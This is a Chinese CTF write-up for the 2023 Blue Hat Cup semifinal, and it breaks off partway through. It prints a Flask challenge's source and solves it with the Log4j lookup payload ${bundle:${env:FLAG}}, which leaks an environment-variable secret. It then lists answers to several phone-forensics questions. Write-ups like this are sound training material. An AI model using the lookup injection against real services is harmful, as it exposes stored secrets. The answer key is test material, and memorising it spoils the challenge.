【蓝帽杯2023】半决赛

[TOC]

web

MyLinuxBot

我发明了一个国产版的bot，可以用命令操作

源码：

import os 
import subprocess 
from flask import Flask ,render_template ,request 

jar_path = [已隐藏，内容不重要]
'''老板要我出一个攻击者绝对不会发现的CTF题目
我使用java开发真正需要处理的核心逻辑，并且隐藏在后端，这样绝对安全了
因为攻击者只可能去傻傻的寻找python漏洞，其实不知道应该去寻找Java的经典漏洞
而且我有日志记录攻击者轨迹随时可以发现
他们做梦也想不到我把flag藏在了FLAG环境变量里:-)
'''

app =Flask (__name__ )

@app .route ("/",methods =['GET','POST'])
def aaa():
    if request .method =='POST':
        OOO0000O0000O00O0 =request .form ['text'].split (' ')
        O00O0OO0OO00000OO =''
        if len (OOO0000O0000O00O0 )<1 :
            return ('oh, invalid message',400 )
        elif len (OOO0000O0000O00O0 )<2 :
            O00O0OO0OO00000OO =OOO0000O0000O00O0 [0 ]
            OOO0000O0000O00O0 =''
        else :
            O00O0OO0OO00000OO ,OOO0000O0000O00O0 =OOO0000O0000O00O0 [0 ],' '.join (OOO0000O0000O00O0 [1 :])
        OOO0OOO0000OO0000 =bbb (O00O0OO0OO00000OO ,OOO0000O0000O00O0 )
        return OOO0OOO0000OO0000 
    return render_template ('home.html')

def bbb (O0OOOO0O0000OOOOO ,O000O0O0O00O00OO0 ):
    with open("/flag","r") as f:
        FLAG = f.read()
    O00000O0OOO0OO00O =subprocess .run (['java','-jar','-Dcmd='+O0OOOO0O0000OOOOO ,jar_path,'--',O000O0O0O00O00OO0 ],
                                        capture_output =True ,timeout =12,env={"FLAG":FLAG})
    return O00000O0OOO0OO00O .stdout .decode ('utf-8')

if __name__ =='__main__':
    port =os .environ ['PORT']if 'port'in os .environ else 1337 
    app .run (host ='0.0.0.0',port =port )

https://y4tacker.github.io/2022/07/06/year/2022/7/GoogleCTF2022-Log4j/

直接输入：${bundle:${env:FLAG}}即可

取证

0x01.检材数据开始提取是今年什么时候？（答案格式：04-12 13:26）

09-11 17:21

0x02.嫌疑人手机SD卡存储空间一共多少GB？（答案格式： 22.5）

24.3

0x03.嫌疑人手机设备名称是？（答案格式：adfer）

sailfish

0x04.嫌疑人手机IMEI是？（答案格式：3843487568726387）

352531082716257

0x05.嫌疑人手机通讯录数据存放在那个数据库文件中？（答案格式：call.db）

contacts.db

0x06.嫌疑人手机一共使用过多少个应用？（答案格式：22）